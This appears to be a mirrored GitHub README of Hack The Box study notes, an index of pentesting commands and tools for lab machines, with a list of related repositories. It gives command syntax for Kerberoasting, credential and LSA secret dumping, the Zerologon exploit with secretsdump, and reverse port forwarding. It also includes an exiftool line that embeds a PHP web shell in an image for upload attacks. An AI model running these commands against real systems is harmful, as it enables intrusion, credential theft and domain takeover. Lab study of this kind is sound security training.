cyberwr3nch / Hackthebox
Licence: mit
Notes Taken for HTB Machines & InfoSec Community.
Stars: ✭ 167
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Hackthebox
hackthebox
Notes Taken for HTB Machines & InfoSec Community.
Stars: ✭ 286 (+71.26%)
Mutual labels: guide, cheatsheet, infosec, star
Ios
Most usable tools for iOS penetration testing
Stars: ✭ 563 (+237.13%)
Mutual labels: cheatsheet, infosec, tools
Py2rs
A quick reference guide for the Pythonista in the process of becoming a Rustacean
Stars: ✭ 690 (+313.17%)
Mutual labels: cheatsheet, guide
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+420.96%)
Mutual labels: cheatsheet, infosec
Hacker Container
Container with all the list of useful tools/commands while hacking and pentesting Kubernetes Clusters
Stars: ✭ 105 (-37.13%)
Mutual labels: infosec, tools
Techinterview
💎 Cheat sheet to prep for technical interviews.
Stars: ✭ 454 (+171.86%)
Mutual labels: cheatsheet, guide
Github Serendipity.github.io
快速找到流行开源项目 browse and find high quality repo quickly and elegantly, with trending, rank, awesome, topics, similar dimensions
Stars: ✭ 524 (+213.77%)
Mutual labels: guide, tools
Globbing
Introduction to "globbing" or glob matching, a programming concept that allows "filepath expansion" and matching using wildcards.
Stars: ✭ 86 (-48.5%)
Mutual labels: cheatsheet, guide
http-simple-cheatsheet
Simple HTTP status codes cheatsheet 🦄
Stars: ✭ 18 (-89.22%)
Mutual labels: guide, cheatsheet
Gitlab Watchman
Monitoring GitLab for sensitive data shared publicly
Stars: ✭ 127 (-23.95%)
Mutual labels: infosec, tools
Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+1067.07%)
Mutual labels: cheatsheet, infosec
Kotlin Quick Guide
A quick guide to Kotlin for developers.
Stars: ✭ 127 (-23.95%)
Mutual labels: cheatsheet, guide
HOUDINI
Hundreds of Offensive and Useful Docker Images for Network Intrusion. The name says it all.
Stars: ✭ 791 (+373.65%)
Mutual labels: tools, cheatsheet
from-gms-to-hms
Complete guide to adding support for Huawei's mobile services and distribution platform into your apps that are already published on Google Play.
Stars: ✭ 30 (-82.04%)
Mutual labels: guide, cheatsheet
InfosecHouse
Infosec resource center for offensive and defensive security operations.
Stars: ✭ 61 (-63.47%)
Mutual labels: tools, infosec
Infosec Badges
Badges for your GitHub tool presented at InfoSec Conference
Stars: ✭ 74 (-55.69%)
Mutual labels: infosec, tools
git-cheatsheet
One stop guide to help solve all your doubts related to Git & GitHub.
Stars: ✭ 31 (-81.44%)
Mutual labels: cheatsheet, star
archcheatsheet
The way of creating custom Arch dual-boot system without desktop environment with `no mouse` approach in mind.
Stars: ✭ 83 (-50.3%)
Mutual labels: guide, cheatsheet
Pyspark Cheatsheet
🐍 Quick reference guide to common patterns & functions in PySpark.
Stars: ✭ 108 (-35.33%)
Mutual labels: cheatsheet, guide
hackthebox
Notes Taken for HTB Machine
Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams
Yet More to be updated
created & maintained by: cyberwr3nch
Contents
Commands Reference
File | Contents |
---|---|
Active Directory | Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet |
Directory Enumeration | gobuster, rustbuster, wfuzz, vhosts |
File Transfer | ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impackets |
Nmap | Nmap, PortScanning, Tags |
Notes | DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding |
Password Cracking | hashcat, john, hashexamples, zip file cracking |
Post Exploitation | current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic |
Regular Commands | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch |
Reverse Shells | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners |
Web Attacks | sql-injection, login bruteforce( wfuzz, hydra) |
Docker Commands | installation, building, pulling, updating, deleting, listing, cheatsheet |
Git Commands | clone, commit, push, pull, add, log, deleted file, checkout |
Pivoting | POST Exploitation, Pivoting, Chisel |
Tools
Windows and Active Directory
Tool | Use | Command Syntax |
---|---|---|
Bloodhound.py | BloodHound written in python. Used to obtain AD infromations from a windows machine | python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all |
Impackets | Swiss Knife for most Windows AD attacks |
python GetNPUsers.py <domain_name>/ -usersfile <users_file> = ASREPRoasting python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> = Kerberoasting |
Kerbrute | A tool written in GO to enumerate AD users | ./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file> |
CredDump | Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available |
./pwdump.py <system hive> <sam hive> = Obtain Password Credentials ./cachedump.py <system hive> <sam hive> = obtain cached credentials ./lsadum.py <system hive> <sam hive> = Obtain LSA Dumps |
PwdDump | After getting the administrative access, running this will get the password hashes |
.\PwDump7.exe |
ApacheDirectoryStudio | LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine | sudo ssh -L 389:172.20.0.10:389 [email protected] |
Port Forwarding
Tool | Use | Command Syntax |
---|---|---|
Chisel | Used to forward a service running on a port in the victim machine |
./chisel server -p <port no.> --reverse = on the attacker machine ./chisel client <attackerip:port> R🔢127.0.0.1:1121 = Forwards the service running on port 1121 to the port 1234 on attackers machine |
socat | Swiss Knife for Port forwarding |
socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port> = Listens on every connection to port 8000 and forwards to the machineIP and its port socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port> = forward all incoming requests to the port 9002 from to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services |
plink | SSH Putty in CLI mode |
.\plink.exe <[email protected]> -R <remote port>:<localhost>:<local port> .\plink.exe [email protected] -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888 |
ssh | uses the built in ssh service to port forward a service |
Remote Port Forwarding: > Command should be entered on the compromied machine ssh <[email protected] -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f = Open the port 3000 in the cyberwr3nch's machine and forwards the service running in port 80 to the cyberwr3nch's 3000. So visiting 127.0.0.1:3000 in cyberwr3nch's browser will be the same of visiting 127.0.0.1:80 on the victim machine |
Directory Enumeration
Tool | Use | Command Syntax |
---|---|---|
DirSearch | Directory enumeration Tool | python3 dirsearch.py -u <url> -e <extn> |
Gobuster | Directory enumeration tool written in GO | gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads> |
RustBuster | Direcotry Enumeration tool written in rust | rustbuster dir -u <url> -w <wordlist> -e <extn> |
Post Exploitation
Tool | Use | Command Syntax |
---|---|---|
LinEnum | Post Enumeration scripts that automates enumeration | ./LinEnum.sh |
LinPeas | Post Enumeration Script | ./linpeas.sh |
WinPEASbat/WinPEASexe | Windows post enumeration script and exe | .\winPEAS.bat |
Misc
Tool | Use | Command Syntax |
---|---|---|
Exiftool | Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension file.php.ext
|
./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext> |
Git Dumper | Dump the Github repo if found in website | ./git-dumper.py <website/.git> <output folder> |
lxd-alpine builder | When a victim machine is implemented with lxc the privesc is done with this | article here |
Php-reverse-shell | Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell | |
ZerologonPOC | CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. PS: Latest Version of Impackets is required | python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\[email protected] |
Gopherus | SSRF with gopher:// protocol |
gophreus --exploit phpmemcache |
SAY NO TO MSF !
Admired Bloggers
These are the urls that has the writeups for active and retired machines
- snowscan's Blog ⭐️
- xct's Blog ⭐️
- My Blog 💀 (inactive for a period of time)
- nav1n
- 0xPrashanth
- BinaryBiceps
- p0i5on8
- lUc1f3r11's Blog
- subham399
- Jacob Riggs
- elbee infoSec
- Kali-education
- roman.de
- 0xdf's Blog
- 0xrick's Blog
- SecJuice
- Sector 035 OSINT ⭐️
nvm this
Constantly updating from MAY 3rd 2020
Thanks for visiting
A noob cyberwr3nch🔧
A member of TCSC
Learn and Spread <3
xoxo💙
Support My contents
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].